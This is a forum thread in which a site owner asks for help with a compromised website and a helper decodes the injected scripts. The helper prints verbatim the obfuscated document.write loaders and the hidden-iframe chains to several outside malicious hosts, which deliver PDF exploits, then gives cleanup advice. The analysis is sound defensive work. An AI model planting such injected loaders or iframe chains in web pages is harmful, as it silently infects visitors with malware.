Malware Related > Compromised Servers

Malware attack on my sites

(1/2) > >>

smtemp:
Please help me identify and remove these malware from my sites D:  I went to visit my sites and I got these errors. (One version is in Safari and another is in FireFox) I use a mac.

http://i17.photobucket.com/albums/b53/smtemp/Picture6.png
http://i17.photobucket.com/albums/b53/smtemp/Picture7.png

I'm going to my own websites and these stupid things pop up and try to force me to download a .pdf. I force cancel before it gets to far though. I believe my website host must have been hacked or something.. I can't find anything abnormal in my own code on my sites which are:
http://www.anicoz.com
http://www.ratemycosplay.com

Please help D:

MysteryFCM:
The code in imgratemycosplay_com.gif Decodes to;


--- Code: ---document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,100,97,115,114,101,116,111,107,102,105,110,46,99,111,109,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,60,47,105,102,114,97,109,101,62));
--- End code ---

Which decodes to;


--- Code: ---<iframe src="http://dasretokfin.com/index.php" width="0" height="0" style="display:none;"></iframe>
--- End code ---

Which contains yet more encoded JS that leads to a fake codec.

The code in imgratemycosplay_com-2.gif decodes to;


--- Code: ---window.status='Done';document.write('<iframe name=282620 src="http://8speed.org/t/?'+Math.round(Math.random()*12002)+'282620'+'" width=353 height=34 style="display:none"></iframe>')
--- End code ---

Which loads;


--- Code: ---<iframe name=9619574bea1 src='http://sexbases.cn/in.cgi?16&cc5f86' width=106 height=52 frameborder='0'></iframe>
--- End code ---

Which loads (changed html to hxml to prevent problems with BBCode breakout);


--- Code: ---<hxml><frameset rows="100%"><frame src="http://sexbases.cn/edit.html"></frameset></hxml>
--- End code ---

Which loads;


--- Code: ---<iframe src=http://firstgate.ru/33/tr.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://sexbases.cn/gr.php width=1 height=1 style="display:none"></iframe>
--- End code ---

firstgate.ru loads a PDF exploit and sexbases.cn loads;


--- Code: ---<iframe src=http://peskufex.cn/ss/in.cgi?9 width=1 height=1 style="display:none"></iframe>
--- End code ---

Which loads another PDF exploit, courtesy of;


--- Code: ---function PDF()
{
for (var i=0;i<navigator.plugins.length;i++) {
var name = navigator.plugins[i].name;
if (name.indexOf("Adobe Acrobat") != -1) {
                                                                 location.href = "spl/pdf.pdf";
}
}

}
PDF();
--- End code ---

The code in imgratemycosplay_com-3.gif decodes to;


--- Code: ---window.status='Done';document.write('<iframe name=c5642 src="http://8speed.org/t/?'+Math.round(Math.random()*15808)+'c5642'+'" width=208 height=76 style="display:none"></iframe>')
--- End code ---

Which is the same as imgratemycosplay_com-2.gif

MysteryFCM:
To remove these, first and foremost, get your site offline whilst the server is checked to ensure the server itself hasn't been exploited. If the server is clean, upload a CLEAN copy of your sites files, and have your host identify and fix, whatever vulnerability allowed them to get in in the first place.

In addition to this, ensure FTP and all other passwords, are changed ASAP.

smtemp:
Thank you!

MysteryFCM:
No problem :)

Navigation

[0] Message Index

[#] Next page

Go to full version